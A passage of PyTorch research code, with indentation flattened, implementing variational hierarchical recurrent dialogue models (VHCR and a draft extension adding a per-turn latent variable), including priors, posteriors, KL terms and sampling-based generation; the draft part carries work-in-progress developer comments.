return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden=None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
samples = torch.stack(samples, 1)
return samples
class VHCR(nn.Module):
def __init__(self, config):
super(VHCR, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions + config.z_conv_size)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.unk_sent = nn.Parameter(torch.randn(context_input_size - config.z_conv_size))
self.z_conv2context = layers.FeedForward(config.z_conv_size,
config.num_layers * config.context_size,
num_layers=1,
activation=config.activation)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_inference = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout,
bidirectional=True)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size + config.z_conv_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.conv_posterior_h = layers.FeedForward(config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.conv_posterior_mu = nn.Linear(config.context_size,
config.z_conv_size)
self.conv_posterior_var = nn.Linear(config.context_size,
config.z_conv_size)
self.sent_prior_h = layers.FeedForward(config.context_size + config.z_conv_size,
config.context_size,
num_layers=1,
hidden_size=config.z_sent_size,
activation=config.activation)
self.sent_prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_h = layers.FeedForward(config.z_conv_size + config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.sent_posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def conv_prior(self):
# Standard gaussian prior
return to_var(torch.FloatTensor([0.0])), to_var(torch.FloatTensor([1.0]))
def conv_posterior(self, context_inference_hidden):
h_posterior = self.conv_posterior_h(context_inference_hidden)
mu_posterior = self.conv_posterior_mu(h_posterior)
var_posterior = self.softplus(self.conv_posterior_var(h_posterior))
return mu_posterior, var_posterior
def sent_prior(self, context_outputs, z_conv):
# Context dependent prior
h_prior = self.sent_prior_h(torch.cat([context_outputs, z_conv], dim=1))
mu_prior = self.sent_prior_mu(h_prior)
var_prior = self.softplus(self.sent_prior_var(h_prior))
return mu_prior, var_prior
def sent_posterior(self, context_outputs, encoder_hidden, z_conv):
h_posterior = self.sent_posterior_h(torch.cat([context_outputs, encoder_hidden, z_conv], 1))
mu_posterior = self.sent_posterior_mu(h_posterior)
var_posterior = self.softplus(self.sent_posterior_var(h_posterior))
return mu_posterior, var_posterior
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# Standard Gaussian prior
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
conv_mu_prior, conv_var_prior = self.conv_prior()
if not decode:
if self.config.sentence_drop > 0.0:
indices = np.where(np.random.rand(max_len) < self.config.sentence_drop)[0]
if len(indices) > 0:
encoder_hidden_input[:, indices, :] = self.unk_sent
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
# context_inference_hidden: [batch_size, num_layers * num_directions * hidden_size]
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
log_q_zx_conv = normal_logpdf(z_conv, conv_mu_posterior, conv_var_posterior).sum()
log_p_z_conv = normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
kl_div_conv = normal_kl_div(conv_mu_posterior, conv_var_posterior,
conv_mu_prior, conv_var_prior).sum()
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([encoder_hidden_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
sent_mu_posterior, sent_var_posterior = self.sent_posterior(
context_outputs, encoder_hidden_inference_flat, z_conv_flat)
z_sent = sent_mu_posterior + torch.sqrt(sent_var_posterior) * eps
log_q_zx_sent = normal_logpdf(z_sent, sent_mu_posterior, sent_var_posterior).sum()
log_p_z_sent = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
# kl_div: [num_sentences]
kl_div_sent = normal_kl_div(sent_mu_posterior, sent_var_posterior,
sent_mu_prior, sent_var_prior).sum()
kl_div = kl_div_conv + kl_div_sent
log_q_zx = log_q_zx_conv + log_q_zx_sent
log_p_z = log_p_z_conv + log_p_z_sent
else:
z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([encoder_hidden_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
z_sent = sent_mu_prior + torch.sqrt(sent_var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
log_p_z += normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
log_q_zx = None
# expand z_conv to all associated sentences
z_conv = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_conv_size)
for z, m in zip(z_conv, input_conversation_length)])
# latent_context: [num_sentences, context_size + z_sent_size +
# z_conv_size]
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
# conv_mu_prior, conv_var_prior = self.conv_prior()
# z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
encoder_hidden_list = []
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
encoder_hidden = torch.stack(encoder_hidden_list, 1)
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor([n_context] * batch_size)))
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
context_hidden = context_init
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction *
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(torch.cat([encoder_hidden, z_conv], 1),
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.sent_prior(context_outputs, z_conv)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init, decode=True)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(torch.cat([encoder_hidden, z_conv], 1),
context_hidden)
samples = torch.stack(samples, 1)
return samples
class VHCR_new(nn.Module):
def __init__(self, config):
super(VHCR, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions + config.z_conv_size+config.z_ctx_size) ## add z_ctx
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.unk_sent = nn.Parameter(torch.randn(context_input_size - config.z_conv_size-config.z_ctx_size)) ##omit dimension config.z_ctx_size
self.z_conv2context = layers.FeedForward(config.z_conv_size,
config.num_layers * config.context_size,
num_layers=1,
activation=config.activation)
"""edit here"""
self.context2context_first = layers.Context2Context(config.context_size*2+config.z_conv_size,
config.context_size)
self.context2context = layers.Context2Context(config.context_size*2
+config.z_conv_size+config.z_ctx_size,
config.context_size)
"""stop here"""
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions) ##infer z_conv
self.context_inference = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout,
bidirectional=True)
#Change bidirectional to false to make hidden_size same when inferring in ctx_z
self.ctx_inference = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size + config.z_conv_size+config.z_ctx_size, ##add config.z_ctx_size
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.conv_posterior_h = layers.FeedForward(config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.conv_posterior_mu = nn.Linear(config.context_size,
config.z_conv_size)
self.conv_posterior_var = nn.Linear(config.context_size,
config.z_conv_size)
#z_sen do add z_ctx or not?
self.sent_prior_h = layers.FeedForward(config.context_size + config.z_conv_size+config.z_ctx_size, #z_sen_prior(h_ctx,z_conv,z_ctx)
config.context_size,
num_layers=1,
hidden_size=config.z_sent_size,
activation=config.activation)
self.sent_prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_h = layers.FeedForward(config.z_conv_size+config.z_ctx_size+config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size, ##z_sen_posterior (h_ctx,z_conv,z_ctx,x_encode)
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.sent_posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
##z_ctx_prior
self.ctx_prior_h = layers.FeedForward(config.z_conv_size+config.context_size,
config.context_size,
num_layers=1,
hidden_size=config.context_size, ##use config.context_size or config.z_ctx_size?
activation=config.activation)
self.ctx_prior_mu = nn.Linear(config.context_size,
config.z_ctx_size)
self.ctx_prior_var = nn.Linear(config.context_size,
config.z_ctx_size)
##z_ctx_posterior
self.ctx_posterior_h = layers.FeedForward(config.z_conv_size+config.context_size+config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
##context_h is based on x(<t),z_conv,h_context(t) but how to only use x(<t) the expression above just like z_conv using x
self.ctx_posterior_mu = nn.Linear(config.context_size,
config.z_ctx_size)
self.ctx_posterior_var = nn.Linear(config.context_size,
config.z_ctx_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def conv_prior(self):
# Standard gaussian prior
return to_var(torch.FloatTensor([0.0])), to_var(torch.FloatTensor([1.0]))
def conv_posterior(self, context_inference_hidden):
h_posterior = self.conv_posterior_h(context_inference_hidden)
mu_posterior = self.conv_posterior_mu(h_posterior)
var_posterior = self.softplus(self.conv_posterior_var(h_posterior))
return mu_posterior, var_posterior
##ctx_prior
def ctx_prior(self,context_outputs,z_conv):
h_prior = self.ctx_prior_h(torch.cat([context_outputs, z_conv], dim=1))
mu_prior = self.ctx_prior_mu(h_prior)
var_prior = self.softplus(self.ctx_prior_var(h_prior))
return mu_prior, var_prior
#ctx_posterior
def ctx_posterior(self,ctx_inference_hidden,context_outputs,z_conv):
h_posterior = self.ctx_posterior_h(torch.cat([context_outputs,ctx_inference_hidden,z_conv],1))
mu_posterior = self.ctx_posterior_mu(h_posterior)
var_posterior = self.softplus(self.ctx_posterior_var(h_posterior))
return mu_posterior,var_posterior
#do I need to add z_ctx in sen_prior and sen_posterior?
def sent_prior(self, context_outputs, z_conv,z_ctx):
# Context dependent prior
h_prior = self.sent_prior_h(torch.cat([context_outputs, z_conv, z_ctx], dim=1))
mu_prior = self.sent_prior_mu(h_prior)
var_prior = self.softplus(self.sent_prior_var(h_prior))
return mu_prior, var_prior
def sent_posterior(self, context_outputs, encoder_hidden, z_conv,z_ctx):
h_posterior = self.sent_posterior_h(torch.cat([context_outputs, encoder_hidden, z_conv, z_ctx], 1))
mu_posterior = self.sent_posterior_mu(h_posterior)
var_posterior = self.softplus(self.sent_posterior_var(h_posterior))
return mu_posterior, var_posterior
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
# num_sentences = sentences.size(0) - batch_size num_sentence is the input sentences
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# Standard Gaussian prior
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
conv_mu_prior, conv_var_prior = self.conv_prior()
if not decode:
if self.config.sentence_drop > 0.0:
indices = np.where(np.random.rand(max_len) < self.config.sentence_drop)[0]
if len(indices) > 0:
encoder_hidden_input[:, indices, :] = self.unk_sent
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
# context_inference_hidden: [batch_size, num_layers * num_directions * hidden_size]
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
log_q_zx_conv = normal_logpdf(z_conv, conv_mu_posterior, conv_var_posterior).sum()
log_p_z_conv = normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
kl_div_conv = normal_kl_div(conv_mu_posterior, conv_var_posterior,
conv_mu_prior, conv_var_prior).sum()
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
#expand z_conv to batch_size, max_len, z_conv_size then every sentence can use z_conv
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
"""code for context"""
context_outputs = []
z_ctx = []
ctx_mu_prior = []
ctx_var_prior = []
ctx_mu_posterior = []
ctx_var_posterior = []
ctx_eps = to_var(torch.randn((batch_size, self.config.z_ctx_size)))
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
ctx_inference_outputs, ctx_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
context_init1 = context_init.squeeze(0)
for i_ctx in range(max_len):
if i_ctx==0:
context_cell_input = torch.cat([encoder_hidden_input[:,i_ctx,:], z_conv_expand[:,i_ctx,:]], 1)
context_h_cell = self.context2context_first(
context_cell_input,
hidden=context_init1)
else:
context_cell_input = torch.cat([encoder_hidden_input[:,i_ctx,:], z_conv_expand[:,i_ctx,:],z_ctx_cell],1)
context_h_cell = self.context2context(
context_cell_input,
hidden=context_h_cell)
#z_ctx_cell: [batch_size,num_directions * context_size]
ctx_cell_mu_prior,ctx_cell_var_prior = self.ctx_prior(context_h_cell,z_conv_expand[:,i_ctx,:])
ctx_cell_mu_posterior,ctx_cell_var_posterior = self.ctx_posterior(ctx_inference_outputs[:,i_ctx,:],context_h_cell,z_conv_expand[:,i_ctx,:])
z_ctx_cell = ctx_cell_mu_posterior + torch.sqrt(ctx_cell_var_posterior) * ctx_eps
z_ctx.append(z_ctx_cell)
ctx_mu_prior.append(ctx_cell_mu_prior)
ctx_var_prior.append(ctx_cell_var_prior)
ctx_mu_posterior.append(ctx_cell_mu_posterior)
ctx_var_posterior.append(ctx_cell_var_posterior)
context_outputs.append(context_h_cell)
#context_outputs: [batch_size,max_len,context_size]
#z_ctx:[batch_size,max_len,context_size]
context_outputs = torch.stack(context_outputs,1)
ctx_mu_prior = torch.stack(ctx_mu_prior,1)
ctx_var_prior = torch.stack(ctx_var_prior,1)
ctx_mu_posterior = torch.stack(ctx_mu_posterior,1)
ctx_var_posterior = torch.stack(ctx_var_posterior,1)
z_ctx = torch.stack(z_ctx,1)
"""stop here"""
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
##z_ctx faltten and its mu and var
"""code edit here"""
z_ctx_flat = torch.cat(
[z_ctx[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_mu_posterior_flat = torch.cat(
[ctx_mu_posterior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_var_posterior_flat = torch.cat(
[ctx_var_posterior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_mu_prior_flat = torch.cat(
[ctx_mu_prior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_var_prior_flat = torch.cat(
[ctx_var_prior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
log_q_zx_ctx = normal_logpdf(z_ctx_flat, ctx_mu_posterior_flat, ctx_var_posterior_flat).sum()
log_p_z_ctx = normal_logpdf(z_ctx_flat, ctx_mu_prior_flat, ctx_var_prior_flat).sum()
kl_div_ctx = normal_kl_div(ctx_mu_posterior_flat, ctx_var_posterior_flat,
ctx_mu_prior_flat, ctx_var_prior_flat).sum()
"""stop here"""
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat,z_ctx_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
sent_mu_posterior, sent_var_posterior = self.sent_posterior(
context_outputs, encoder_hidden_inference_flat, z_conv_flat,z_ctx_flat)
z_sent = sent_mu_posterior + torch.sqrt(sent_var_posterior) * eps
log_q_zx_sent = normal_logpdf(z_sent, sent_mu_posterior, sent_var_posterior).sum()
log_p_z_sent = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
# kl_div: [num_sentences]
kl_div_sent = normal_kl_div(sent_mu_posterior, sent_var_posterior,
sent_mu_prior, sent_var_prior).sum()
kl_div = kl_div_conv + kl_div_sent+kl_div_ctx
log_q_zx = log_q_zx_conv + log_q_zx_sent + log_q_zx_ctx
log_p_z = log_p_z_conv + log_p_z_sent + log_p_z_ctx
else:
z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
# context_outputs: [batch_size, max_len, context_size]
"""code for context how to dropout? need dropout?"""
context_outputs = []
z_ctx = []
ctx_mu_prior = []
ctx_var_prior = []
ctx_eps = to_var(torch.randn((batch_size, self.config.z_ctx_size)))
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
ctx_inference_outputs, ctx_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
context_init1 = context_init.squeeze(0)
for i_ctx in range(max_len):
if i_ctx==0:
context_cell_input = torch.cat([encoder_hidden_input[:,i_ctx,:], z_conv_expand[:,i_ctx,:]], 1)
context_h_cell = self.context2context_first(
context_cell_input,
hidden=context_init1)
else:
context_cell_input = torch.cat([encoder_hidden_input[:,i_ctx,:], z_conv_expand[:,i_ctx,:],z_ctx_cell],1)
context_h_cell = self.context2context(
context_cell_input,
hidden=context_h_cell)
#z_ctx_cell: [batch_size,num_directions * context_size]
ctx_cell_mu_prior,ctx_cell_var_prior = self.ctx_prior(context_h_cell,z_conv_expand[:,i_ctx,:])
z_ctx_cell = ctx_cell_mu_prior + torch.sqrt(ctx_cell_var_prior) * ctx_eps
z_ctx.append(z_ctx_cell)
ctx_mu_prior.append(ctx_cell_mu_prior)
ctx_var_prior.append(ctx_cell_var_prior)
context_outputs.append(context_h_cell)
#context_outputs: [batch_size,max_len,context_size]
#z_ctx:[batch_size,max_len,context_size]
context_outputs = torch.stack(context_outputs,1)
ctx_mu_prior = torch.stack(ctx_mu_prior,1)
ctx_var_prior = torch.stack(ctx_var_prior,1)
z_ctx = torch.stack(z_ctx,1)
"""stop here"""
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
"""code edit here"""
z_ctx_flat = torch.cat(
[z_ctx[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_mu_prior_flat = torch.cat(
[ctx_mu_prior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_var_prior_flat = torch.cat(
[ctx_var_prior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
"""stop here"""
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat,z_ctx_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
z_sent = sent_mu_prior + torch.sqrt(sent_var_prior) * eps
kl_div = None
